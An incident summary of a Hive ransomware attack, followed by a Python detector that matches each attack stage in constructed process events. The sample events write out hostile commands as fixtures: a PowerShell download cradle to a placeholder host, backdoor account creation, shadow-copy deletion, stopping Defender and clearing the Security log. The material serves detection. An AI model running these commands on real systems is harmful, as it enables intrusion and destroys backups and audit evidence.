Hive Ransomware Attack Analysis

The Varonis Forensics Team has published an investigation of an incident involving Hive ransomware in which the whole intrusion took under 72 hours. The attack began by exploiting the Exchange ProxyShell vulnerability to load a webshell on the Exchange server. Following initial access, PowerShell Invoke-Expression commands were executed to download Cobalt Strike payloads. For persistence, the attackers created a new user account, and they dumped credentials using Mimikatz. With those credentials, the attackers moved laterally within the environment using mstsc.exe and began discovery with a ping sweep and the SoftPerfect network scanning tool; output from the scanned systems and the collected credentials were saved to a text file. In the final stage, the threat actors executed the ransomware, which disabled volume shadow copies, stopped services including Windows Defender, and cleared the Windows Security logs. Hive, a ransomware-as-a-service operation, was first observed in June 2021 targeting healthcare, nonprofits, retailers, and energy providers, among other sectors.
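Each stage of the chain above leaves a process-creation signal a SOC can alert on. The following is an added example, not code from the Varonis or Anvilogic teams: it encodes the described stages as rules, runs them over constructed Sysmon-style events, and flags a ping sweep statefully. The command forms, host names, and the netscan.exe binary name for SoftPerfect are assumptions.

```python
import re

def ev(host, parent, image, cmdline):
    return {"host": host, "parent": parent, "image": image.lower(), "cmdline": cmdline}

# Constructed process-creation events mirroring the stages in the write-up;
# the command forms are assumptions, not the incident's own commands.
SAMPLE_EVENTS = [
    ev("exch01", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ev("exch01", "cmd.exe", "powershell.exe",
       "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"),
    ev("exch01", "cmd.exe", "net.exe", "net user svc_backup Passw0rd /add"),
    ev("exch01", "cmd.exe", "mimikatz.exe", "mimikatz.exe"),
    ev("exch01", "explorer.exe", "mstsc.exe", "mstsc.exe /v:fs01"),
    ev("fs01", "cmd.exe", "netscan.exe", "netscan.exe"),
    ev("fs01", "cmd.exe", "vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ev("fs01", "cmd.exe", "net.exe", "net stop WinDefend"),
    ev("fs01", "cmd.exe", "wevtutil.exe", "wevtutil cl Security"),
] + [ev("exch01", "cmd.exe", "ping.exe", f"ping -n 1 10.0.0.{i}") for i in range(1, 31)]

# (stage, required parent or None, accepted image names, command-line regex or None), in attack order.
RULES = [
    ("initial access: webshell under w3wp.exe spawned a shell", "w3wp.exe", ("cmd.exe", "powershell.exe"), None),
    ("execution: PowerShell Invoke-Expression download cradle", None, ("powershell.exe",),
     r"(?=.*\b(iex|invoke-expression)\b)(?=.*(downloadstring|downloadfile|net\.webclient))"),
    ("persistence: local user account created", None, ("net.exe", "net1.exe"), r"\buser\b.*\s/add\b"),
    ("credential access: Mimikatz by image name (a renamed copy evades this)", None, ("mimikatz.exe",), None),
    ("lateral movement: RDP client launched", None, ("mstsc.exe",), None),
    ("discovery: SoftPerfect scanner (netscan.exe is an assumed binary name)", None, ("netscan.exe",), None),
    ("impact: volume shadow copies deleted", None, ("vssadmin.exe",), r"delete\s+shadows"),
    ("impact: Windows Defender service stopped", None, ("net.exe", "sc.exe"), r"\bstop\s+windefend\b"),
    ("impact: Security event log cleared", None, ("wevtutil.exe",), r"\bcl\s+security\b"),
]

def matches(rule, e):
    _, parent, images, pat = rule
    return ((parent is None or e["parent"].lower() == parent) and e["image"] in images
            and (pat is None or re.search(pat, e["cmdline"], re.I) is not None))

def match_stages(events):  # stages hit, in first-seen order; a full chain is the strong signal
    seen = []
    for e in events:
        seen += [r[0] for r in RULES if r[0] not in seen and matches(r, e)]
    return seen

def ping_sweep_hosts(events, threshold=20):  # hosts that pinged >= threshold distinct addresses
    targets = {}
    for e in events:
        m = e["image"] == "ping.exe" and re.search(r"\d{1,3}(?:\.\d{1,3}){3}", e["cmdline"])
        if m:
            targets.setdefault(e["host"], set()).add(m.group(0))
    return sorted(h for h, t in targets.items() if len(t) >= threshold)
```

Any single rule here will fire on legitimate administration; the value is in correlating several stages on one host within a short window, as this incident's sub-72-hour timeline suggests.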
